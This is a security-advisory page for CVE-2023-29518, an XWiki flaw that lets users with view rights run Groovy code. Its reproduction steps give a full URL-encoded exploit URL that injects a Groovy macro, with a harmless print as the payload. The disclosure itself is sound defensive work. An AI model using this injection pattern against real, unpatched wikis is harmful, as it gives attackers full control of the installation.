Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-29518: Privilege escalation (PR) from view right using Invitation.InvitationCommon

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any user with view rights can execute arbitrary Groovy, Python or Velocity code in XWiki leading to full access to the XWiki installation. The root cause is improper escaping of Invitation.InvitationCommon. This page is installed by default. The vulnerability has been patched in XWiki 15.0-rc-1, 14.10.1, 14.4.8, and 13.10.11. Users are advised to upgrade. There are no known workarounds for this issue.

CVE
#vulnerability#web#apache#docker

Steps to reproduce:

Open <xwiki-host>/xwiki/bin/view/%5D%5D%20%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22Hello%20%22%20%2B%20%22from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D?sheet=Invitation.InvitationCommon&xpage=view&test=1 where <xwiki-host> is the URL of your XWiki installation.

Expected result:

The message

testLoadInvitationConfig Class document ]] {{async async="true" cached="false" context="doc.reference"}}{{groovy}}println("Hello " + “from groovy!”){{/groovy}}{{/async}} not found. can’t run test.

(or similar) or no message at all (not sure the test parameter is a real feature and not a bug), but not the string "Hello from groovy!".

Actual result:

The message

testLoadInvitationConfig Class document ]] {{async async="true" cached="false" context="doc.reference"}}{{groovy}}println("Hello " + “from groovy!”){{/groovy}}{{/async}} Hello from groovy!.WebHome]] not found. can’t run test.

is displayed. With Apache Tomcat/9.0.68 (Docker container), the message is Class document view Hello from groovy!.WebHome]] not found. can’t run test. as it somehow considers “xwiki/bin/view” as part of the document reference. In both cases, this demonstrates a privilege escalation from view to programming rights.

Note that Invitation.InvitationCommon contains a rights object that explicitly grants view rights to all users and guests so this might even be exploitable on otherwise relatively closed wikis if the exploit URL can be constructed to allow view rights for the user used by the attacker (not sure if this is possible).

Related news

GHSA-px54-3w5j-qjg9: XWiki Platform vulnerable to privilege escalation from view right using Invitation.InvitationCommon

### Impact Any user with view rights can execute arbitrary Groovy, Python or Velocity code in XWiki leading to full access to the XWiki installation. The root cause is improper escaping of `Invitation.InvitationCommon`. This page is installed by default. See https://jira.xwiki.org/browse/XWIKI-20283 for the reproduction steps. ### Patches The vulnerability has been patched in XWiki 15.0-rc-1, 14.10.1, 14.4.8, and 13.10.11. ### Workarounds The issue can be fixed by applying this [patch](https://github.com/xwiki/xwiki-platform/commit/3d055a0a5ec42fdebce4d71ee98f94553fdbfebf) on `Invitation.InvitationCommon`. ### References - https://github.com/xwiki/xwiki-platform/commit/3d055a0a5ec42fdebce4d71ee98f94553fdbfebf - https://jira.xwiki.org/browse/XWIKI-20283 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki.org](https://jira.xwiki.org/) * Email us at [Security Mailing List](mailto:[email protected])

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907